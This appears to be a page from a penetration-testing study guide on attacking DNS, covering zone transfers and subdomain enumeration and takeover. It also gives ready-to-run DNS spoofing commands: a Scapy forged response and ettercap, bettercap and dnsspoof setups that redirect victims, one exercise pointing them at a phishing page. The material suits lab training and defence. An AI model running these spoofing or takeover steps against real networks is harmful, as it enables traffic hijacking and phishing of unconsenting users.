DNS

I. DNS Basics

Function: Translates human-readable domain names (e.g., example.com) to IP addresses (e.g., 192.0.2.1) via a hierarchical, distributed database. Supports A/AAAA (IPv4/IPv6), CNAME (aliases), MX (mail), TXT (SPF/DKIM), NS (nameservers), and more. Ports:

UDP/53 (default for queries; connectionless, fast but unreliable for large responses).
TCP/53 (for zone transfers, EDNS0 large packets >512 bytes, or TCP fallbacks).

Importance: Enables nearly all internet traffic; misconfigurations expose internal networks, enable pivoting, or facilitate lateral movement.

Addition: Record Types Quick Reference Table

Record Type

Purpose

Pentest Relevance

Example Query (dig)

A/AAAA

IP resolution

Basic recon; identify hosts

dig example.com A

CNAME

Aliases

Subdomain takeovers

dig sub.example.com CNAME

Mail servers

Phishing vectors

dig example.com MX

Nameservers

Zone transfer targets

dig example.com NS

TXT

Arbitrary text (e.g., SPF)

Credential leaks, SSRF payloads

dig example.com TXT

SOA

Zone authority

Enumeration metadata

dig example.com SOA

Attack Vectors (Expanded):

DNS zone transfers (AXFR/IXFR).
Domain/subdomain takeovers.
DNS spoofing/cache poisoning (e.g., Kaminsky attack).
DNS amplification (DoS): Forge source IP to reflect large UDP responses.
DNS rebinding: Tricks browsers into resolving to the attacker's IP after the initial legit load.
DNS tunnelling: Encapsulate data (e.g., reverse shells) in DNS queries for C2 evasion.

Prerequisites for All Attacks: Passive recon first (e.g., WHOIS, Shodan for exposed NS records). Always use --no-check-certificate in tools if dealing with self-signed certs in labs.

II. Enumeration

Goal: Map the DNS infrastructure to identify entry points. Start passive (no noise), then active. Passive Techniques (New Addition):

Use Certificate Transparency (CT) logs: crt.sh/?q=%.example.com (browser or curl).
VirusTotal/PassiveTotal for historical subdomains.
Google dorks: site:*.example.com -www (via search engine).

Active Enumeration Tools:

Nmap (Enhanced): Scans for open resolvers and versions; integrates scripts for brute-forcing.

nmap -p53 -Pn -sV --script=dns-zone-transfer,dns-recursion -oA dns_enum <target_IP>

Explanation: -Pn skips host discovery; -sV versions services; --script runs NSE for transfers/recursion checks. Output: XML/JSON for parsing.
- Expected Output: Open ports, service banners (e.g., BIND 9.16 vulnerable to CVE-2020-8616).
- Troubleshooting: If no results, check the firewall with nmap -sS -p53 target.
Masscan (faster for large scopes):

masscan -p53 --rate=1000 <target_range> --banners | grep "53/open"

Chain with Nmap: masscan ... | nmap -iL - -sV --script=dns-*.
dnsrecon (all-in-one):

    dnsrecon -d example.com -t brt,std,axfr -D /usr/share/wordlists/dnsmap.txt

Types: brt (brute-force), std (standard records), axfr (transfers).

Best Practice: Rate-limit scans (--max-rate 10 in Nmap) to avoid detection. Log everything.

III. DNS Zone Transfers

Function: AXFR (full zone) or IXFR (incremental) copies entire zone files; legit for secondary NS sync but risky if public. Vulnerability: Misconfigured allow-transfer in named.conf (e.g., BIND) permits anon access. Detection:

From Nmap output (Section II).
dig NS example.com to list potential NS targets.

Tools (Enhanced with Alternatives):

dig (Core Tool):

dig AXFR example.com @ns1.example.com +short

Explanation: @ specifies server; +short for clean output. If successful: Lists all records.
- Error Handling: "Transfer failed" → Try TCP: dig @ns1.example.com example.com AXFR +tcp.
- IXFR Test: dig IXFR=20231101 @ns1.example.com example.com.
fierce (Domain-Focused):

fierce --domain example.com --subdomain-file /usr/share/wordlists/subdomains-top1million-5000.txt --file output.txt

Option: --subdomain-file for custom wordlists; brute-forces common subs during transfer attempts.
dnsenum (Brute + Transfer):

dnsenum --dnsserver ns1.example.com --enum -f /usr/share/wordlists/dnsmap.txt example.com

Chains transfer with permutation brute-forcing (e.g., admin.example.com).

Tool Comparison Table

Tool

Strengths

Weaknesses

Use Case

dig

Simple, protocol-level

Manual, no automation

Quick AXFR tests

fierce

Subdomain integration

Noisy, outdated dict

Initial domain mapping

dnsenum

Brute + permute + transfer

Slower on large domains

Comprehensive enum

Practice Tip: In lab, misconfigure BIND (allow-transfer { any; };) and transfer from Kali. Report as "High" risk with proof-of-concept screenshot.

IV. Domain/Subdomain Takeovers

Domain Takeover: The Attacker registers lapsed domains (check via WHOIS expiration dates). Subdomain Takeover: Orphaned CNAMEs pointing to defunct PaaS (e.g., Heroku, GitHub Pages).

Enumeration Tools (Expanded):

subfinder (Fast, Passive-Heavy):

subfinder -d example.com -all -o subs.txt -v -t 100

Options: -all uses all sources (CT, APIs); -t 100 concurrency; -v verbose for debugging.
Sublist3r:

python sublist3r.py -d example.com -o subs.txt -v -t 20 -e google,baidu,yahoo

Engines: Specify for diversity.
subbrute (Brute-Forcing):

# Setup (one-time):
git clone https://github.com/TheRook/subbrute.git
cd subbrute
echo "8.8.8.8" > resolvers.txt  # Add more resolvers for reliability
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-5000.txt -O names.txt
    
    # Run:
./subbrute example.com -s names.txt -r resolvers.txt -t 50

New: -t 50 threads; chain output: cat subs.txt | sort -u | httpx -silent > live_subs.txt (filter live hosts).
Amass (OWASP, Intel-Gathering Focus):

amass enum -d example.com -o amass_subs.txt -config ~/.amass/config.ini

Config: Add API keys for passive sources (e.g., Shodan).
Gobuster (DNS Mode Brute):

gobuster dns -d example.com -w /usr/share/wordlists/subdomains-top1million-20000.txt -t 50 -o gobuster_dns.txt

Fast for wildcard detection.

CNAME Enumeration & Verification:

host/nslookup:

host -t CNAME sub.example.com  # Output: sub.example.com is an alias for deadservice.herokuapp.com.
    nslookup -q=CNAME sub.example.com

Verification (Enhanced):
- Manual: Curl the CNAME target for errors (e.g., AWS: curl https://bucket.s3.amazonaws.com → "NoSuchBucket").
- Tool: Clone can-i-take-over-xyz repo:

git clone https://github.com/EdOverflow/can-i-take-over-xyz.git
cd can-i-take-over-xyz
python detect.py --stdin < cnames.txt  # Input file of CNAMEs

Nuclei Templates (for automated vuln scanning):

nuclei -l subs.txt -t cves/ -tags takeover -o takeovers.json

Risks (Expanded): Beyond phishing/CSRF, add server-side request forgery (SSRF) via misconfigured origins and supply-chain attacks (e.g., hijack npm registry subdomain).

Practice Exercise: Use crt.sh on a test domain; simulate takeover by creating a free Heroku app and pointing a CNAME. Verify with curl.

V. DNS Spoofing/Cache Poisoning

Function: Forge responses to redirect traffic (e.g., bank.com → attacker.com). Methods (Expanded):

MITM-Based: ARP/DHCP spoof + DNS hijack.
Remote: Birthday attacks on transaction IDs (Kaminsky: Predictable source ports/IDs in older BIND).
Local Cache Poisoning: Target resolver caches via rogue DHCP.
Scapy for Custom Packets (Advanced):

scapy
>>> ip = IP(src="8.8.8.8", dst="target_ip") / UDP(sport=12345, dport=53) / DNS(rd=1, qd=DNSQR(qname="example.com"), an=DNSRR(rrname="example.com", rdata="192.168.1.100"))
>>> send(ip)

Explanation: Crafts spoofed response; use in MITM setup.

Tools:

Ettercap (GUI/CLI Enhanced):
1. Edit /etc/ettercap/etter.dns: example.com A 192.168.1.100.
2. Launch: ettercap -G (GUI) → Hosts → Scan for hosts → Select Target1 (victim) and Target2 (gateway).
3. Plugins → Manage Plugins → dns_spoof (activate).
4. Sniff → Unified sniffing (interface).
- CLI Alternative: ettercap -T -M arp:remote /gateway/ /victim/ -P dns_spoof /etc/ettercap/etter.dns.
- Troubleshooting: No spoof? Check iptables: iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53.
Bettercap (Modern Replacement):

bettercap -iface eth0
> set dns.spoof.domains example.com
> set dns.spoof.address 192.168.1.100
> net.probe on; net.recon on; arp.spoof on; dns.spoof on
> set arp.spoof.targets <victim_IP>
> arp.spoof on

Advantages: Modular, supports HTTPS stripping.
dnsspoof (from dsniff):

    dnsspoof -i eth0 host example.com and udp port 53

Requires hosts file entry: 192.168.1.100 example.com.

Best Practice: Verify with Wireshark (filter dns); test redirect by browsing spoofed domain on victim. Practice Exercise: In an isolated VM lab, spoof internal DNS to redirect to a phishing page. Capture evidence with tcpdump.

VI. Latest DNS Vulnerabilities

Core: Subdomain takeovers remain prevalent (CNAME to expired services like Azure/Shopify). New/Recent (Based on 2024-2025 Trends):

DNSSEC Bypass (e.g., CVE-2024-4076 in Unbound): Weak chain-of-trust; test with drill -D example.com (expects validation failure).
DoT/DoH Misconfigs: Exposed DNS over TLS/HTTP (port 853/443); scan: nmap -p853,443 --script ssl-cert target.
Amplification Vectors: Open resolvers for DDoS; test: dns-amp target -p53.
Zone Walking via Chaos Queries: dig @ns1.example.com example.com CH TXT version.bind (leaks server version).
Risks Update: Add RCE via DNS (e.g., Log4Shell in DNS logs) and AI-Driven Poisoning (emerging; simulate with custom scripts).

Detection Tool: dns-vuln-scan repo for automated checks. Practice Tip: Review CWEs (e.g., CWE-200: Exposure); exploit in DVWA lab.

Key Commands Summary (Consolidated Table)

Use this as a cheat sheet.

Final Prep Tips:

Integration: Chain with other pentest phases (e.g., feed subs to Nikto for web vulns).
Common Pitfalls: Rate-limiting, IPv6 oversights (-6 flag), legal scoping (ROE).
Exam Focus: Explain impacts (e.g., "Enables pivoting to internal nets"); practice verbal walkthroughs.
Resources: "The Hacker Playbook 3" (DNS chapter), TryHackMe "DNS in Detail" room.

PreviousAttacking Common Services NextFTP

Last updated 5 days ago